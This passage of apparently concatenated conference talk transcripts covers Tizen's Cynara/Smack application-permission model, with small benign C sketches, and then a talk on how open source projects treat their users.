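    if (getsockopt(client_fd, SOL_SOCKET, SO_PEERSEC, label, &llen) == 0)
        printf("caller Smack label: %.*s\n", (int)llen, label);

    /* These two values, plus a privilege name, are exactly what the
     * service then passes to Cynara (see the earlier sketch). */
}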
And hopefully we can show this in a demo. I prepared the demo on, I don't remember, Ubuntu or Fedora. It's not an embedded system, definitely. But I just wanted to show you that you are not limited to embedded mobile devices. So here we are with two applications installed on the operating system. One is contacts and one is some other application, an evil calculator. What to notice on this first screen is that, as I told you at the very beginning, there are these privileges, like in Android or like in iOS, for example. And here we have the information that the contacts application has read access to contacts denied, and editing contacts is also denied. And we go a little further. We run this contacts application. And as you can see, contacts could not be fetched from the contacts book, which is a service in this example. It could be a plain file, like a database, but whatever. We know that the access for reading or editing is denied, so this application could not have this access. Next, we change the permissions in real time, I mean, in the live system. And this time, we can access the contacts. Now we try to edit contacts. As you can see, the access for editing is denied. So when we try to save, we have permission denied for this action. Editing is editing as well, so we can't. Now we change the permission to ask user. So every time some application tries to edit contacts, we will be presented with a pop-up. Now we save this particular edit, and we are presented with a prompt to allow this or not. If we deny, then we again have this permission denied. And if we allow, it's done, we could save this contact. What's more, this application was legitimate. I mean, we installed it. It requested in the manifest that it will be using contacts in this particular way. I mean, it requested that it will read contacts and edit contacts, and we have the possibility to change these permissions, to alter these permissions, even live. But there's also another application. It's not so legitimate, but somehow it is present in our operating system. Maybe it's just a random application we downloaded from the Internet, and it didn't request any privileges, but let's see what will happen. So we downloaded this application. It seems to be legitimate. It does what it does. It's a calculator, but it has a hidden function. That's why it's evil. It tries to read our contacts. It wasn't supposed to do so. But with the plain old classic security approach, there is nothing to stop this application from accessing the resources of our system or accessing services on our operating system. When we use the security model I'm presenting, we can know. We can know that this application, which is evil, wants to do something that it's not supposed to do. And we, of course, deny this action. But what if we allowed it? Yes, it just read our contacts. And I believe this is it for the demo. Hopefully you now get the idea. Just another implementation detail. This contacts service was a service. In this example, it was served over D-Bus IPC, but it doesn't have to be D-Bus. It could be a Unix socket, it could be whatever. But it was D-Bus IPC in this particular example. Sometimes we have some resources that we don't want to be governed by a service. For example, we want to have raw access to the camera device on our system, just because it is faster. We can do so as well within this security model. And this is how we use groups. We apply a group, for example camera-users, to the device, that is, the device node of our camera, of our microphone, or whatever. And when the application, in this example the camera, is launched, we apply this group to this application. We do not apply this group, like in the classic approach, to the user, because if user Bob or Susan was in the camera-users group, all of their applications would have access to this device. But we don't want that. We want to distinguish that the camera application has this access and the calculator doesn't. So we do not put the user in the group, but we put distinct applications of this user. It's done at launch time. And it works just like I explained.
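A very rough sketch of what such a privileged launcher might do before exec'ing the application: set the process's Smack label through /proc/self/attr/current, attach the supplementary group that owns the device node (for example, a camera-users group owning /dev/video0 with mode 0660), and then drop to the target user. In Tizen this goes through the Security Manager client library rather than being done by hand, and the label, group ID and paths below are invented for illustration.

/* Very rough sketch of what a privileged launcher does before exec'ing an
 * app: set the process's Smack label, attach the supplementary group that
 * guards a device node (e.g. a camera-users group owning /dev/video0 with
 * mode 0660), then drop to the target user. In Tizen this goes through the
 * Security Manager client library; label, group id and paths are invented. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <grp.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

int launch_app(const char *exe, uid_t uid, gid_t gid)
{
    /* 1. Label the process (needs CAP_MAC_ADMIN). */
    const char *label = "App::Camera";
    int fd = open("/proc/self/attr/current", O_WRONLY);
    if (fd < 0 || write(fd, label, strlen(label)) < 0)
        perror("set Smack label");
    if (fd >= 0)
        close(fd);

    /* 2. Supplementary groups for direct device access (needs CAP_SETGID). */
    gid_t groups[] = { 1100 /* hypothetical camera-users gid */ };
    if (setgroups(1, groups) < 0)
        perror("setgroups");

    /* 3. Drop to the target user and start the application. */
    if (setgid(gid) < 0 || setuid(uid) < 0)
        return -1;
    char *const argv[] = { (char *)exe, NULL };
    execv(exe, argv);
    perror("execv");
    return -1;
}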
Okay, that would be it. There are some bonuses. First of all, you probably noticed that when you have some service, like in the examples here, the contacts service or the GPS service, it has to have some code to contact Cynara, to query Cynara, in order to know which requests should be served or not. This is true. The services need some modifications. But they don't have to. They don't have to. If the services are using D-Bus, then it's already done. I mean, we have a patch for D-Bus, so we can intercept messages on this bus, and it's transparent for both the service and the client. They don't even have to know of the existence of the security model, of Cynara and so on. You just write config files saying that some particular service, the methods on D-Bus, are protected with some kind of access right, and that's it. The second bonus is Nether. It allows us to configure the very same access control for networking. I mean, that this application can access network resources and the other doesn't. You can configure different access for different hosts, for different protocols, and so on. The third bonus is nice-lad. You can audit all this stuff. You can follow the requests. You can follow the accesses. You can follow the answers for these requests, in terms of whether a request was allowed or denied, and so on. This is important, especially at the beginning of work with this security model, because you have many services and applications, and sometimes it's hard to configure it properly from the very beginning, and this tool helps you with it. Okay. Hopefully, I showed you the difference, the main difference, between the classic approach to security and the one I'm proposing. Hopefully, I showed you that this classic mechanism is not enough in a modern world with more and more applications from different sources, like different kinds of application stores, and so on, and that's it. If you have any questions, I think we have some time. Yeah? Okay. At this stage of development, could your software also fake an access for the application? Can you explain more? What do you mean by faking? If you have an application that is evil, but the user wants this application. For example, you have Facebook, and if you install Facebook, they capture all your contacts at the installation process, and afterwards, you can block them from your contacts, but at the installation, it is mandatory, you gave them access to your contacts, so they are gone. The user wants Facebook to run on his device, and if it doesn't run properly, he will rip off your extension, your security extension, to get this application. Do you understand what I mean? You mean that if at installation time, I grant the application rights to read my contacts? No, no, no. For security reasons, you have to do a fake in the direction of that application. You have to fake that your contacts are empty, or there is only bullshit in it, and give that to Facebook, so they capture nonsense, but you can install that application, and afterwards, you can block the contents, that is, the contact contents, for the application, and Facebook is fine with this. Okay, now I get it. First, you don't have to do this. This approach was taken several years ago by the CyanogenMod project, before Android had this newer security model which allows altering the privileges at runtime. But you don't have to do it this way, because when you install an application and the privilege is privacy-oriented, like contacts, like location, and so on, it's configured by default to ask the user on the first usage, like in newer versions of Android.
So of course, the application, Facebook in your example, requests access to contacts in its manifest, but it won't get it before first prompting the user if they want to allow it. Yeah, I understand, but the user wants that application, and if he has to decide, will they get my contacts or not, and you make a pop-up, and he can install if it's granted, and he cannot install if he says no, so he will say yes, and live with that. Okay, but first of all, the application will be installed anyway. So I mean, you accept the requested privileges, but they won't be granted before the first use, really. So when this Facebook application runs for the first time, only then does it access the contacts. At this time, you can decide, do I accept it or not. But returning nonsense contacts is on a different layer; it would need to be implemented in this contacts service, for example. This framework doesn't... Yeah, but you said you have to update or implement that in your services, so why don't we implement that too? Yeah, we could implement it this way, but we don't think it's really needed. I mean, this pop-up is only one of the extensions to this security model. I mean, there is a plugin which shows a pop-up, allow or deny, but you could implement your own extension which presents a pop-up: allow, deny, return nonsense. It would be up to you what happens when the user chooses the third option. But we... This framework is very generic. We run it on Tizen smartphones, for example, and smart TVs with Tizen. I just showed you it on Fedora. If we wanted to implement... I mean, we don't know what services exist on a system. It's generic. It just grants accesses or not. It doesn't know what services are on the system or what these services do. So implementing such things like returning nonsense as contacts is beyond this project's... Yeah. Has it been run on Ubuntu Touch, for example, yet? No. I ran it on plain Ubuntu, like the desktop, and it works okay. I think that there are no restrictions on running it on Ubuntu Touch. You just have to implement, for example, this pop-up extension. I mean, this was just a quick example I hacked up in one evening just to show you in the demo. It was in Qt. If you implemented it in the toolkit used on Ubuntu Touch, it would work. Great. Thank you. Okay. How does it technically work? So if a program wants to open an address book, which is in some kind of file, does it somehow intercept system calls, or how does it prevent a program from bypassing the... Okay. If the address book was a file on the file system, we would apply a group to this file, for example contacts-users, and only users in this group would have access to this file. And also, only applications which are in this group would have access to this file. So at launch time of the application, groups are applied to the process. So if this database with contacts has the group contacts-users, then this running application, this launched application, would need to be in this group to access this file. Does it not... What happens with network connections? What do you say? When you want to open a network socket, this usually doesn't depend on any kind of groups in Linux. Yeah. This is done by a special module. It's Nether. It's intercepting packets. I don't remember what this technique is called, but it's just like iptables, which decides which packets can go through and which cannot.
It's more like some kind of simple firewall, but it not only checks the origin and destination of the packets, it also knows which user and which application created this packet, or which user and which application is going to get this packet. Thanks. Okay. As far as I'm concerned, you just said that you just hacked up the demo, the privacy manager. I think it's actually a pretty nice solution to have something like that on a desktop system as well. Okay. So are you at any stage planning to actually release and work on a privacy manager like that in the future, or was it just for the demo and someone else is going to have to do that? Okay. First of all, no, I'm not going to continue on this because it would really need to... It's going to need much, much work from the... Not only the administrator of the particular installation, but from the maintainers of distributions. I mean, the contacts service presented here runs on D-Bus. So if services run on D-Bus, we can just patch D-Bus in one place, in one distribution, and we're okay. But many services don't work on D-Bus. They open their own sockets, they share their memory, they share their files. They would need to be modified in some way. Of course, Cynara provides some helper libraries. So you can use these libraries to modify the services without much effort. I mean, you just link with this library and you have a socket from the client. You just give this library the socket and it does the work. So it's not much effort to modify services, but there are a lot of them. For this security model to be effective, you have to modify all the resources or the services. I showed it on a desktop system just to show you it's possible. But is it feasible? I don't think so. So it's better suited for mobile devices. Because there's one manufacturer who decides what kinds of applications are shipped by default and then, of course, they can modify those few applications and then the whole system itself is, of course, built around this security model. Yes, of course. As I told you in the beginning, this security model was meant for the Tizen operating system. And I worked on this effort. I worked on Tizen and we could decide which way to go and we could even implement the needed modifications to the services. And there was, I mean, a limited number of these services. If you want to go into the wild and do it in Fedora, it's just too much work. Thanks. Hello. Hello. I have a question regarding the camera example that you have there. Which one? The one with the camera users. Right, this one. This one? Yeah. You activate some group, right, to access the camera. But what if you want to access the camera and also the GPS? So do you activate another group? Or, like, if you have a process and it's running under one group, can you not have a process running under two groups? When the process is launched, it can run with an arbitrary number of groups. So you can apply the camera-users group, the GPS-users group and so on. It's an arbitrary number. Just like a user can be in different groups at the same time, so can the process. It can be in several groups at the same moment. Okay. Thank you. One last question, okay? Okay. Thank you. As far as I understood, Cynara requires a patched D-Bus to operate in a secure manner. Yeah. I mean... Are these patches going to be integrated into D-Bus? Not really. I mean, Tizen is open source and you can download these patches from tizen.org. But we haven't done any effort yet to upstream these patches to D-Bus.
But I mean, we take newer and newer versions of D-Bus and we backport these patches, but it's not really upstream and I don't think it will be in the near future. This concept is not so popular. I mean, it's in one of several systems, like Tizen, for example. Some parts of this model run in different IoT-oriented distributions, but it's not so popular that it would be accepted in upstream D-Bus, I think. Not in the near future. Okay, how does it differ from something like PolicyKit? It doesn't differ much, but to be honest, we tried to use PolicyKit instead of Cynara. But PolicyKit is something that is meant to run in GUI interfaces mainly. So, I don't want to say that PolicyKit was slow, but it was. If you want every single request for some service or resource in the operating system to be, let's use this word, intercepted, interpreted and managed, it can't be slow. And PolicyKit was too slow for us. So we implemented our own. I mean, PolicyKit was okay. But I mean, 100 milliseconds is not much if you show a pop-up every time. But if you do several hundreds of requests per second, it matters. Okay. And one last question about the concept illustrated in the slide. Do you use something like sudo to supply additional groups to the process at startup of the process? Yeah, I mean, this launcher is a privileged process which can apply different security contexts, for example, groups. Okay. Thank you. Thank you. Okay. We're already out of time. So thank you again for listening.
|
Security and privacy of information stored on embedded devices is gaining in importance. It turns out that security models designed for desktops and servers cannot be directly adopted for embedded devices. Moreover, desktop systems themselves seem to lag behind when it comes to accessing privilege-oriented resources like the camera, microphone or address book. Aleksander will show how growing security requirements for operating systems are fulfilled with the use of existing Linux mechanisms, like MAC or DAC, and new ones, like Cynara and Security Manager. You will have a chance to learn about the complete security framework implemented in the Tizen operating system and the Linux Foundation's Automotive Grade Linux, and get to know how a well-designed solution can provide security and privacy for the whole system, relieving the efforts of 3rd-party developers.
|
10.5446/32442 (DOI)
|
I'd like to introduce to you Leslie Hawthorn, who was responsible for making Google's Summer of Code great again, and especially responsible for Google Code-in. After some time at Elastic, she now works for Red Hat, where she is part of the Open Source and Standards team. And she will talk about how open source projects handle their users, how they work with their users and how they can improve on making their users happy. So big round of applause for Leslie. Thank you so much for that introduction, Scotty. Hello everyone, thank you very much for coming. I'm honored to be back at FrOSCon again this year. This is my second FrOSCon and it will certainly not be the last. I'm here today to talk again, as Scotty said, about the way that open source projects interact with their users and why certain behaviors are extremely problematic and why they can contribute not only to a lack of user happiness, but I believe to a lack of adoption of open source. And I feel very strongly that this topic is important because I think that we are at a crucial time in the evolution of technology where people are aware enough of the implications of the choices that they make about what software they run and what tools they use and how those have a greater social impact and an impact on themselves and their freedoms. So when my dear friend Valerie, who is a teacher, a high school teacher of students in their 11th year of high school who are recent migrants from Haiti and the Dominican Republic, and who inevitably, every time I see her, hands me her mobile phone and says, can you please make these notifications go away? They're horrifying me. And I discovered she hadn't done a software update in the two years since I last saw her. When she calls me and says, Blondie, what is this open source stuff? Because I think we're being spied on and that's not good. Then I know we're at a critical time to be able to bring more users into the free and open source software fold and to help them understand why it's important that they use free and open source software. So unfortunately, I don't think that we do a very good job of welcoming people into the open source world. Although I have to admit, every time I come to FrOSCon and have a talk to give that rants about how we don't treat people really well, I am reminded that this is probably the worst audience in the world to give these talks to, because everyone in this community is so welcoming and so cool and is so invested in helping other people learn that I then am grateful that at least there's a video. So maybe this will be useful to folks who are not in this particular audience. So this talk is actually, hey, slides, why do you hate me? All right, you just, there's so much hatred. La, la, la. Do you want to do a thing? You do want to do a thing. This is excellent. So this talk actually started as a very private rant between myself and my dear friend Donna Benjamin. And this is actually a 10-year-long sort of bubbling thing inside of ourselves where Donna and I would get together at various conferences and have the, I am your user, why do you hate me rant? So Donna Benjamin is not a developer. Donna Benjamin is a content strategist. She is a community organizer. She's been responsible for the adoption of open source software across a number of governmental departments in Australia, in her province of Victoria. She lives in Melbourne and works extensively there with the Department of Education. She's migrated them off of a proprietary CMS onto Drupal.
She's helped them to get courses on open source software into computer science and IT curriculums in universities there. And so obviously, very accomplished woman has been involved in the open source community for many decades. I'm also not a developer. I'm not a lawyer. I'm one of those people who helps folks deal with their squishy human problems and also creates mentoring programs or mentorship opportunities to help get more people involved in open source development, be that programming, be that design, documentation, etc. So we were sitting together at a table and something happened that generated this epic rant. And when we got together 10 years later to finally give this talk, we sat down and both sheepishly looked at each other and said, do you remember why we started ranting about this? And she didn't remember either. So there was some whiskey involved, mistakes were made, but at least this rant came out of it. So effectively, we would consistently, after that, when we met up, we would look at each other and we would say, I am your user. Why do you hate me? And what we were referring to was this, to us, very odd pattern of behavior amongst our friends and colleagues who were open source developers who just seemed to have this deep contempt for the people who were using their software. I mean, for a long time, once upon a time, I was dating a systems administrator and every day when he would be done with work, he would come down home, flop down in his easy chair and say, users, every single day, these were the first words out of his mouth. And I couldn't figure out why there was this deep level of contempt. And obviously, there are many stupid questions to be asked and I think I've asked a few of them, but it just seemed to me to be so outsized. And I was frequently, along with Donna, in conversations where these kinds of rants against stupid users and their stupid ideas and their stupid bug reports and why don't they just figure out, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah, blah. And we would kind of sit there sheepishly, very quietly. And then folks at the table would notice that we were being very quiet and they'd say, no, no, no, not you, we love you. You guys are great. But the people you're describing, the behaviors you're describing, like not a developer, not a, you know, not a maintainer of an open source project, these things applied to us. So we were thinking, we're your user too. Why do you hate us? Like why is this happening? And I think it starts off with our understanding of what a user is. So a user is somebody who just uses a computer network or service, right? Somebody who lacks the skill to be able to develop a particular system is a user of that system. Okay, fair enough. This is accurate. But I wonder about this particular part of the definition, without the technical expertise required to fully understand it. Does anybody here actually understand everything about how their computer works? Excellent, not a single hand has been raised. And there are no doubt many computing experts in this audience. The idea that our users are somehow lacking in intelligence and are not worthy of our respect because they do not fully understand the systems which they use is ridiculous. None of us actually understand fully how all of our technology works, which I think is actually a fairly scary proposition. So let's talk about some of the ways in which we display sad, sad behavior towards our users. 
I am personally a big Shakespeare fan, and his sonnet, "How do I love thee? Let me count the ways." So he is the inspiration for our five ways we can show deep hatred towards our users. This one is great. This software is just for Brainiac me. I do not care about your needs. I am not here to make this work for you. Now there is something to be said for the fact that it is very fair that open source is motivated by, to use the common phrase, scratching your own itch, creating something that you yourself need. And that is great. There is nothing wrong with that. But the idea that if someone comes along and has improvements to contribute, has questions about how something works, or effectively wants to get involved but they do not quite know how, and the response that they receive is basically something along the lines of there is the door, thank you very much, except usually it is said with many more swear words that I am not going to use because we are on video, that would be inappropriate. So the idea that the software that we create is only for people who are just like us, people who are super geniuses, people who are highly, highly technical, people who fully understand the systems that they are using. And if you are not cool like me, you do not get to do this. This is not for you. This is not something that you need to be involved in. I do not need to care about your needs. And that is really, again, that is very sad because it denies us the opportunity to help more people get involved with open source software and understand the value of it, not just from a technical perspective, but also from a social perspective. If it is only something for the wizards and the magicians and the genius programmers of the world, it is not accessible to everyone and not everyone can benefit from it. Stupid user memes. I have to admit that I may have engaged in some stupid user memeing once upon a time because I was the accidental techie for my recruiting department when I worked in HR once upon a time, where I decided that I really liked talking to nerds all day about their technical ambitions, but wow, did I not want to work in human resources ever again. So we create these ideas that our users are idiots and then we trade pictures online about how they are all dumb. Or we have admittedly, I think, hilarious TV shows like The IT Crowd about how all users are stupid, where the guy picks up the phone and all he ever says is, have you tried turning it off and turning it back on again? If it were just that easy all of the time, I think we would have less difficulty. Although I have also been told by someone in the audience last time we gave this presentation that I was giving people far too much credit and I had clearly never worked a help desk. And I said, actually, I had worked a help desk. I had worked a help desk for our applicant tracking system once upon a time during that stint in human resources. And I actually found that more often than not it was a lack of vocabulary on the part of my users. We just weren't using the same words for the same things. So I didn't, you know, but I still occasionally engaged in mocking them. But we have this idea that our users are dumb, like immediately upon approaching them, right? We think that they lie, that if they say that they are experiencing a particular problem, they're not really experiencing that problem, they just want to call us up and vex us and piss us off. Or they just want to file a useless bug report and complain and bitch.
And I just don't feel like that's accurate. And I think that immersing ourselves in these kinds of images and memes about how our users are stupid, useless, and terrible doesn't help us create empathy with the people who are using our software. This one is the bane of my existence. So no, I know better. How many of you are maintainers of a free or open source software project? I see a couple hands in the room. How many people come to you with feature requests that are silly? Ah, yes, okay. John's like, I get all the silly feature requests, all of them. So admittedly, there are times when people will ask for something of you or of a project that doesn't make a lot of sense. My favorite example of this is once upon a time I used to share a cubicle with a gentleman by the name of Karl Fogel, who wrote the seminal work Producing Open Source Software: How to Run a Successful Free Software Project. And amongst his many accomplishments, Karl Fogel was one of the original developers of the Subversion version control system, which some of you in the room may remember as being the cool thing before we all had Git. And it might still be cool, but apparently not, because the kids these days have never even heard of it. So the Subversion project said in their mission statement that their goal was to create a compelling alternative to CVS, to the CVS version control system. Great. So one day, some wonderful human being showed up on their mailing list and said, I know what you guys should do. You should just sit there and like stop working on the Subversion thing and just like work on CVS, right? That's going to be great. Not really. That was not what they intended to do. And I'm not talking about those moments of not listening to people who do drive-by random ridiculous requests of you, because those are drive-by random ridiculous requests. But if someone comes to you with an idea that's largely sane, maybe you just don't want to implement their idea. Maybe you just don't want your software to work in that particular way. But it's still a sane idea. Not listening to them because you know better is really a problem. I know that it can be exhausting to interact with other people. I have a hard enough time dealing with myself, let alone other human beings. But actually taking the time to explain to someone why their idea may not be the best for the project is a great idea, or assuming that they might have something to teach you. Actually letting them explain to you what their issue is, why they're experiencing it, and what they would like to see different is actually, I think, a very fruitful source of dialogue. So it may be that you don't want to do exactly what they're telling you to do, but you can get a great deal of information about why what you have created is suboptimal if you just listen to their frustrations and what problem they are actually trying to solve. And I found that to be a hugely fruitful source of information when working on software projects and trying to help people with, say, user experience design, because folks will come and tell you that what they want is, and this is a very common phrase in the United States, I want a faster horse, when really what they want is a car. But if you help, if you walk through what their use case is and what their needs are, then you're actually going to get useful information that can be beneficial to you, the maintainer. My other favorite, you're just not technical.
How often have you had someone who is not a developer, not in the tech industry, come to you and ask you if they will fix, can you please fix my computer? Okay. And how often did you just want to just tell them, like, no, I will not fix your computer? Yes, okay. So now, did you get frustrated with them immediately because you were thinking, like, you're not technical, you're just kind of an idiot and like, I don't want to deal with you. Another set of people who are like, not technical and idiots yet again. Yeah, okay. That's totally fair, right? That's human. That is completely human thing to do. I am personally deeply offended by this phrase for a number of reasons. One, I think it is ridiculous to define someone by what they are not, right? If all we can do is understand the people that we're interacting with in the context of what they don't do, what they are not capable of, we put them in this very sad space where they can't improve, they can't become better, they can't acquire knowledge, they can't interact with us in a way that is mutually beneficial because they are not something. They are this other thing. They are this not technical thing. And this not technical box over here is something that you can never escape from and nothing will ever be good inside that not technical box. And I also find it very frustrating as a phrase because it is completely meaningless. What does this mean? What is not technical? So is an astrophysicist not technical because that person is not a computer scientist? I don't think that we would necessarily think that. I have been told that my mom is not technical because she still calls me and I remind her to turn the computer on and off again. My mom was one of the first UNIX programmers. She hasn't kept up with her technical skillset, but I would never say that she was not technical just because she does not eat, sleep, and breathe software development anymore. The idea that we can simply dismiss someone's concerns because they are somehow not like us. They are not a developer or maybe they are a developer but they are a developer in a different language and those PHP people are silly or those Ruby people are silly or you are not as good as I am. It creates a really sad dynamic in our interactions with people. And again, we cut ourselves off from the opportunity to learn something useful from folks who are taking their time and energy to give us feedback when we simply put them in this box and say you are not technical, there is nothing useful that I can learn from you. Then we have this idea of kind of like this is more of a meta idea but the users as faceless icons. How many folks are developing anything that has a graphical user interface? Okay, so a couple hands. Mostly systems programmers in this audience I would assume are system ins. I see some nods. I see some people nodding off to sleep. That's fair too. So we have seen over time and I actually find this to be a really compelling development. We have seen over time this kind of evolution from the idea of people pictures and our software going from these weird little kind of chess pawn nebulous things in weird colors. Smurfs are blue, people are not blue just in case anyone was wondering. To actually icons that look like people. But this doesn't seem like it's that big of a deal until you start reading things like the explosion of excitement on social media when they created emojis that were not showing people with white skin tone for example. 
Suddenly people are saying hey, someone finally created something that looks like me. I feel so good about this. This is great. So when we actually take the opportunity to build into the appearance of our software the idea that there are actual people using it, not weird chess smurf things, then we actually create an empathetic relationship with our users. We care about their needs. We want to meet them and their needs matter to us. So we're moving away from this kind of era of our users are these faceless icons. They kind of don't exist. They're this fictional element of stupidity over here while we make something beautiful and hope they don't screw it up too much, and we thank God that we are not on call. Because when they screw it up, we don't hear about it. I think that this is all kind of wrapping up into a nice little package of generally, like, prickly attitudes around open source software projects. This is clearly not true of all projects, but there are some that are notorious, shall we say, for prickly attitudes. Before I was presenting at FrOSCon, I was presenting at the OpenSym conference in Berlin, which is an academic conference about the study of open source software. I was honored to sit in on a presentation by a professor named Megan Squire. She had done a linguistic analysis of the Linux kernel mailing list, which shows that she was a very brave woman to begin with. What she wanted to know was whether there was a difference in communication style amongst the participants in the Linux kernel project, because it was well known that this was a, you know, you enter the LKML only with asbestos underpants on and maybe not even then. It was very interesting because the thing that has stuck in my mind the most was she was doing a measurement of the number of times that people said thank you, or the probability that if someone said thanks in an email, who would it be. Comparing two of the top folks in the project (and I'm not going to name names here because I'm not trying to slam any particular individual, just making a point), for maintainer A there was a 2% likelihood that he said thanks, whereas for maintainer B, who was a little bit further down the food chain, the probability that he said thanks was 98%. So again, we have this ingrained in our culture that it's okay to be rude, to be offensive, to be very, I don't know if there is a non-sweary word to say this, to be very a-holish in our discussions with other people. It's okay to do that. So one of the projects that I'm most excited about having worked on was the Google Code-in program, which was a way to introduce students who were in high school and even younger to open source development, and not just software development, but also documentation, user experience design, marketing, all of the aspects of creating software. And for the very first year, we had some participants from the Plone project, which is a Python-based content management system; I'm not sure if anyone is using it anymore, but hopefully they are. So these folks were having a conference at Google at the same time. Google hosted a bunch of open source software conferences back in the day. And it just so happened that one of the students who had participated in the program with the Plone project lived three or four miles away, and he noticed that all of his heroes, all the people he'd been working with, were going to be in town, and he emailed me and asked if he could come visit.
And I thought that that was a great idea, and I checked around with the conference attendees, and they also thought it was a great idea. And so Jonathan came down to the Google HQ and met everybody. And so, of course, this being a 14-year-old young human, his mother drove him to Google HQ. So that was really cool, and it was great. And there were photo ops, and everyone was really excited to meet him, and they thought he was really brilliant. And it was great. It was a really touching moment. But the best part of the day was when the lead maintainer for the Plone project all of a sudden just sort of stops what he's doing, kind of looks around, eyes shifting left to right, and then he goes over to this young man's mother and says, ma'am, I don't know if you've ever read our mailing list. And she said, what do you mean? And he said, well, you know, we call each other idiots a lot. And say that the other person's a moron, and that their ideas are stupid, and we don't understand why. We're not very nice to each other. We're really not very nice to each other. We just want you to know that that's all a joke. We actually, we really like each other. We really care for each other. We're all friends in real life. Like we go out, and we get beers, and we go to each other's weddings, and we go over to each other's houses for barbecues. And we just want you to know we're not really like that. So now the best part was her response, which was, oh, please, son. I have another son who's a gamer. You're fine. But again, we are so acculturated to the idea that if we are amongst friends, we can be very vitriolic, very unkind in our speech to one another. And this tends to boil over into our discussions with everyone, even people who are not close enough to us to understand that maybe this is just kind of the family in-joke, family rivalry, right? We have acculturated ourselves to the idea that it is OK to be rude, to be unkind, to be unwelcoming, to be prickly like cacti, right? And this, again, this is unfortunate because it cuts us off from the opportunity to learn more about what our users need from us and to welcome them into the fold of using and contributing to open source software. Now I want to talk about the people that you probably think I don't know about, given this talk. Whiny, Entitled, Demanding, Terrible People. How many of you have dealt with whiny, entitled, demanding, awful users? And almost every hand in the room goes up. And I bet when you deal with those folks, your immediate response is to say, you know, I work on this during my free time, or I certainly don't get paid enough to deal with you being a big jerk to me, please, you know, forward yourself to the nearest, like, wastebasket over there, thanks. I'm not here to advocate that anyone put up with bad behavior from their users. If someone is treating you with disrespect, if someone is coming to you and suggesting that you spend your free time developing a feature that they require for their business enterprise and they can't even be bothered to say thank you when you actually develop that feature, like, forget it. Like this is not behavior that I think anyone should be putting up with. I recently read a very... it was just super sad to read it, a post from a maintainer of a very popular library who basically said that he was looking for a maintainer for the three libraries that he was working on, because they had grown in popularity much more than he had ever expected. He had just put them up on GitHub because they were useful to him.
And suddenly there were all kinds of people relying on what he had built and that he basically talked about the stories of, you know, he had had a, he was married, he had recently had a young child and, you know, he had just gotten off of a stint where his day job ended on Friday and he had literally worked from the time he got off of work on that Friday all weekend without sleep, without spending any time with his wife or his young child because someone had filed an issue and said this bug is taking down our website. We are losing sales. If this doesn't get corrected, I am going to get fired. Please, please help me. And this is a good person, right? He just, this is terrible. I don't want this company to go under. I don't want these people to lose their jobs. I don't want this person to get fired because their manager doesn't understand it's not their fault. So he works tirelessly for more than 48 hours to fix this bug. He commits the fix. He puts a note into the GitHub issue that it's been fixed. Please try it out. Let me know that it works. I hope that everything is going to be okay for you guys. Like I wish you the best of success with your business. And he never heard a word. Not even, not even it works. Not even a thank you, just nothing. Now I under no circumstances suggest that anybody should put up with that kind of behavior. I want to talk about creating a reciprocal relationship of respect, compassion, and empathy between developers and users. If people are coming and are refusing to contribute with at least their thanks, if not money for pizza or even heaven for fend, you know, money for your living expenses for hard work that you do in your free time, you don't have to put up with that. That is not okay. This is, by no means am I suggesting some kind of asymmetrical relationship is okay just because we all have to be, you know, have hands across the world and be nice to each other. So I just wanted to make that very clear in case anyone thought that I was suggesting that the software developers of the world suddenly had to become like the world's, you know, unpaid therapists. Like that is not your job. Poor documentation. This is very sad. How many, how many issues do folks realistically think are the result of poor documentation? Like just, okay, show of hands. How many people believe that no one reads the manual? This is very sad. Okay, so about half the room thinks no one reads the manual. Okay. Of those who said that no one reads the manual, how many of you believe that no one reads the manual because there actually is no manual? And about half the hands in the room go up. Okay, very fair. For those of you who think that people do read the manual, how often do you think the manual is actually filled with current information that talks about the current release of the software? There's one hand. Oh my goodness, you poor, deluded soul. It is not true. It is not true. We create, I think this feedback loop of sadness with our users because those who are the most motivated to create software are the least motivated to document it. Right? And fair enough. But again, if you are working in that paradigm, it is very sad to have this kind of poor attitude towards folks who are not software developers who are not technical, who are doing things like technical writing, because clearly technical writing is not technical, who are creating documentation for our projects and helping people be better able to use what we're producing. 
And for some programmers, for some projects, a lack of documentation is like a badge of honor, right? Well yeah, there is no documentation, but you can just read the code, right? And then you know how it's working. Well yeah, sure. I mean, that's true for some people. I have waded into source code a number of times trying to figure out why something was broken, feeling stupid and inadequate and going like, why can I not make this work? Well, you know, every once in a while you get validated because you're like, hey, wait, I think I found a bug. Like, oh yeah, you're right. That doesn't work because of... It's not you. Well, wonderful. Thank you. And I'm so excited that I had to pore through, like, you know, 2,000 lines of source code to figure out that it was your bug and not my stupidity. Like maybe if there had been a manual, I could have said this does not work as expected. Unfortunately, in order to figure out what was expected, I had to go and perform checkouts and things that I did not want to do. So, poor documentation, I think, is a source of a lot of consternation. So if you are not motivated to document what you are working on, make friends with someone who loves to document stuff. And believe me, those people do exist. And they like whiskey. So just... They really do. So, you know, get whiskey and old books. So if you can find a used bookstore that has cool stuff in it and a nice, you know, whiskey bar, you're in heaven, right? Go make friends with those people and they will help you out immensely. Now, let's talk about the current industry darling, and how this is the polar opposite of what most people are experiencing with open source software. How many folks in the audience have heard of Slack? Wow. Okay. Have heard of Slack and wish they had never, never heard of it. So there are some free software implementations of the same kind of functionality that Slack has, Mattermost being one of them. So Slack has gained in popularity to a ridiculous degree, right? So first of all, the startup that has created Slack is now worth something like a billion dollars, which I think is the byproduct of creating a great product, but also Silicon Valley insanity. But if you look at Slack as a tool, merely as a tool, Slack has a core value of helping their users be more effective with using the tool built into the product, right? So you pop up in Slack and there will be suggestions for keyboard shortcuts while it's loading, right? And they're not intrusive because they're just all part of the load screen, right? It's not as though, you know, it's one of those irritating feature tours that will not turn off no matter how many times you say, never show me this tour at startup again. And yes, you click that box and no, it just ignores you. That's not what's going on, right? They have understood that there are non-intrusive ways to slowly but surely remind and educate their users about how to be more effective with what they've created. Now this to me is a great development. This is a wonderful and important thing, but it frightens me because there are a number of free software projects who have stopped using IRC altogether as their communication mechanism, right? And now they're using Slack solely for their communications.
